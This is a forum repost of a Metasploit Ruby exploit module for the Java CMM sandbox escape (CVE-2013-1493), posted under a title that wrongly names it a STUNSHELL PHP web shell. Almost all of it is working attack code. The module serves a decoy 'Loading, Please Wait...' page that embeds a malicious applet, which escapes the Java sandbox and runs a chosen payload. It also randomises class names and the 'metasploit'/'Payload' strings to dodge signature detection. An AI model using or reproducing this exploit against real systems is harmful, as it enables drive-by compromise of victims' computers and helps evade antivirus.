标题:
STUNSHELL PHP Web Shell远程执行代码（注：下文贴出的代码并非 STUNSHELL PHP webshell，而是 Metasploit 的 "Java CMM Remote Code Execution" 浏览器利用模块，CVE-2013-1493，与标题不符）
作者:
admin
时间:
2013-4-4 17:31
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
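# Framework dependencies. The pasted copy used typographic quotes (‘ ’),
# which Ruby does not treat as string delimiters; restored to plain quotes.
require 'msf/core'
require 'rex'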
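# Java CMM (CVE-2013-1493) browser exploit. Serves a Java applet that escapes
# the applet sandbox via the Color Management classes and launches the
# selected payload. The module does not bypass click-to-play: the victim still
# has to approve the applet warning.
#
# Repairs relative to the pasted copy: typographic quotes restored to plain
# quotes, the missing `[` opening the 'Author' array, the doubled quote on
# 'DisclosureDate', the 'DefaultTarget' entry that had drifted into the middle
# of on_request_uri, and an extra trailing `end`.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # Browser Autopwn does not need JavaScript to trigger this exploit.
  autopwn_info({ :javascript => false })

  # Module metadata. Two targets: a pure Java payload (runs wherever the
  # applet runs) and a native Windows x86 payload.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      # The payload travels inside a jar, not a raw buffer: no bad characters
      # and a NOP sled would be meaningless.
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      # Index into Targets: 1 is the Windows x86 native payload (value as
      # posted; 0 would default to the generic Java payload).
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled exploit classes shipped with the framework and
  # randomise the name of the loader class so the served jar does not carry a
  # static, signature-friendly class name.
  def setup
    @init_class           = read_exploit_class('Init')
    @leak_class           = read_exploit_class('Leak')
    @buffered_image_class = read_exploit_class('MyBufferedImage')
    @color_space_class    = read_exploit_class('MyColorSpace')

    # The random name must be exactly as long as "Init": class names sit in
    # the constant pool behind an explicit length prefix, so a replacement of
    # a different length would corrupt the class file. Note gsub! rewrites
    # every occurrence of the byte sequence "Init" in the file, not only the
    # class name.
    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)

    super
  end

  # Serve the exploit. Any "*.jar" path returns a freshly built applet jar,
  # the resource root returns the HTML that embeds the applet, and anything
  # else is redirected to the root.
  #
  # @param cli [Rex::Socket] client connection
  # @param request [Rex::Proto::Http::Request] parsed HTTP request
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    # \z rather than $: anchor to the end of the URI, not the end of a line.
    case request.uri
    when /\.jar\z/i
      send_response(cli, build_jar, { 'Content-Type' => 'application/octet-stream' })
    when %r{/\z}
      # Local deliberately not named `payload`, which is also the accessor
      # build_jar relies on.
      regenerated = regenerate_payload(cli)
      unless regenerated
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, "#{get_resource}/", '')
    end
  end

  # Landing page embedding the applet. The archive name is random per request
  # (on_request_uri serves any *.jar path) and `code` points at the renamed
  # loader class.
  #
  # @return [String] the HTML document
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html << %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html << %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html << %Q|</applet></body></html>|
    html
  end

  private

  # Read one precompiled class from data/exploits/cve-2013-1493 as raw bytes.
  #
  # @param name [String] class name without the ".class" suffix
  # @return [String] binary class-file contents
  def read_exploit_class(name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', "#{name}.class")
    File.binread(path)
  end

  # Assemble the applet jar: the payload's own jar plus the four exploit
  # classes. The tell-tale "metasploit" / "Payload" strings in entry names and
  # contents are swapped for random strings of identical length, again so the
  # class-file length prefixes remain valid.
  #
  # @return [Rex::Zip::Jar] jar with its manifest built
  def build_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file('Leak.class', @leak_class)
    jar.add_file('MyBufferedImage.class', @buffered_image_class)
    jar.add_file('MyColorSpace.class', @color_space_class)

    metasploit_str = rand_text_alpha('metasploit'.length)
    payload_str    = rand_text_alpha('payload'.length)
    jar.entries.each do |entry|
      entry.name.gsub!('metasploit', metasploit_str)
      entry.name.gsub!('Payload', payload_str)
      entry.data = entry.data.gsub('metasploit', metasploit_str)
      entry.data = entry.data.gsub('Payload', payload_str)
    end

    jar.build_manifest
    jar
  end
end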